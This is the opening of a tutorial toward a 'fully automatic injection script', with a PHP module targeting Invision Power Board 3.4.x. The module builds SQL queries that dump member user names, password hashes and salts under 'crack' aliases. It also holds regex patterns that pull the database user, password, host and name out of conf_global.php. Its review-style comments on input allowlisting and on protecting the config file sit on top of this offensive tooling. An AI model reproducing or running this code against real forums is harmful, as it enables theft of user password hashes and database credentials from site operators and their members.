..cool, we will make a new module, and not just any new module: nope, let's make a fully automatic injection script! This tutorial is the first step towards making it. Let's first explain..
<?php
/*
 * Invision Power Board — default module properties.
 *
 * Names the table, table prefix and columns (user name, e-mail, password
 * hash, password salt) that the query templates built later in this file
 * are assembled from. Key order is kept as-is because the whole array is
 * serialised with json_encode() further down.
 */
$_PROPERTIES = array(
    'name'          => "IPB",
    'version'       => "3.4.x",
    // Column names inside the member table.
    'usernamefield' => "name",
    'emailfield'    => "email",
    'hashfield'     => "members_pass_hash",
    'saltfield'     => "members_pass_salt",
    // Table name and prefix are stored separately and concatenated when used.
    'tablename'     => "members",
    'tableprefix'   => "ipb_",
    // NOTE(review): presumably the path of this module file relative to the
    // tool that loads it — not used anywhere in this file; confirm.
    'filename'      => "ipb/ipba.php",
);
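// Request-supplied table/column names are concatenated, unquoted, into the SQL
// templates built below. Escaping meant for quoted string literals does not
// constrain a value used as an identifier, so each name is checked against a
// strict allowlist instead: ASCII letters, digits and underscore, 1-64 chars.
// \A and \z anchor the whole string, so a trailing newline is rejected too.
// Returns true when $value is an acceptable identifier, false otherwise.
$ipbIsPlainIdentifier = function ($value, $allowEmpty = false) {
    if (!is_string($value)) {
        // Arrays (e.g. sTableName[]=x) and missing fields never qualify.
        return false;
    }
    if ($value === '') {
        return $allowEmpty;
    }
    return preg_match('/\A[A-Za-z0-9_]{1,64}\z/', $value) === 1;
};

// Use POST variables instead if values are different from default.
// The loose comparison is kept so the same iUseDefault values as before
// trigger the override branch.
if (isset($_POST['iUseDefault']) && $_POST['iUseDefault'] == 0) {
    // Property key => POST field that may override it.
    $ipbOverridable = array(
        'usernamefield' => 'sUserNameField',
        'emailfield'    => 'sEmailField',
        'hashfield'     => 'sHashField',
        'tablename'     => 'sTableName',
        'tableprefix'   => 'sTablePrefix',
    );
    foreach ($ipbOverridable as $ipbProperty => $ipbPostKey) {
        $ipbCandidate = isset($_POST[$ipbPostKey]) ? $_POST[$ipbPostKey] : null;
        // An empty prefix is a valid choice (unprefixed tables); every other
        // name must be non-empty. A value that fails the check is ignored and
        // the existing property is left untouched rather than being blanked.
        if ($ipbIsPlainIdentifier($ipbCandidate, $ipbProperty === 'tableprefix')) {
            $_PROPERTIES[$ipbProperty] = $ipbCandidate;
        }
    }
    unset($ipbOverridable, $ipbProperty, $ipbPostKey, $ipbCandidate);
}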
// Raw SQL templates, assembled purely by string formatting from the names held
// in $_PROPERTIES. Those names may have been replaced from $_POST above, and
// they are inserted here as bare identifiers with no quoting, so the resulting
// text is only as trustworthy as the check applied to the names.
$_PROPERTIES['queryraw'] = array(
    // Selects user name, password hash and, when a salt column is configured,
    // the salt. Note the salt column is the one aliased "crackhash".
    'attack' => sprintf(
        'SELECT %s AS crackuser,%s AS crackpass%s FROM %s%s',
        $_PROPERTIES['usernamefield'],
        $_PROPERTIES['hashfield'],
        isset($_PROPERTIES['saltfield'])
            ? sprintf(',%s AS crackhash', $_PROPERTIES['saltfield'])
            : '',
        $_PROPERTIES['tableprefix'],
        $_PROPERTIES['tablename']
    ),
    // '/user/' is emitted literally as part of the template.
    // NOTE(review): presumably the consumer substitutes a user name for it —
    // that substitution is not in this file and needs its own escaping; confirm.
    'getemail' => sprintf(
        "SELECT %s AS temail FROM %s%s WHERE %s='/user/'",
        $_PROPERTIES['emailfield'],
        $_PROPERTIES['tableprefix'],
        $_PROPERTIES['tablename'],
        $_PROPERTIES['usernamefield']
    ),
);
// When the request carries a JSON query parameter (any value, including an
// empty one), dump the whole property table as JSON with caching disabled.
// The dump includes the 'queryraw' templates. No access check is visible in
// this file, and execution is not stopped afterwards: the $_SYSTEM setup
// below still runs.
if (isset($_GET['JSON'])) {
    session_cache_limiter('nocache');
    // Expiry pinned to the Unix epoch so the response is treated as stale.
    header(sprintf('Expires: %s', gmdate('r', 0)));
    header('Content-type: application/json');
    print json_encode($_PROPERTIES);
}
// System descriptor: repeats the module name/version and carries four regular
// expressions plus a file name. Each pattern matches an assignment of the form
// $INFO['sql_...'] = '...' and captures the quoted value (database user,
// password, host and database name respectively).
// NOTE(review): presumably the patterns are applied to the file named in
// 'file' by code outside this module — confirm. For an IPB administrator this
// is a reminder that conf_global.php holds the database credentials in
// clear text and should not be readable through the web server or by other
// accounts on the host.
$_SYSTEM = array(
    'name'     => $_PROPERTIES['name'],
    'version'  => $_PROPERTIES['version'],
    'patterns' => array(
        'user'     => '/\$INFO\[\'sql_user\'\]\s+=\s+\'(.*)?\'/',
        'password' => '/\$INFO\[\'sql_pass\'\]\s+=\s+\'(.*)?\'/',
        'host'     => '/\$INFO\[\'sql_host\'\]\s+=\s+\'(.*)?\'/',
        'database' => '/\$INFO\[\'sql_database\'\]\s+=\s+\'(.*)?\'/',
    ),
    'file'     => "conf_global.php",
);
?>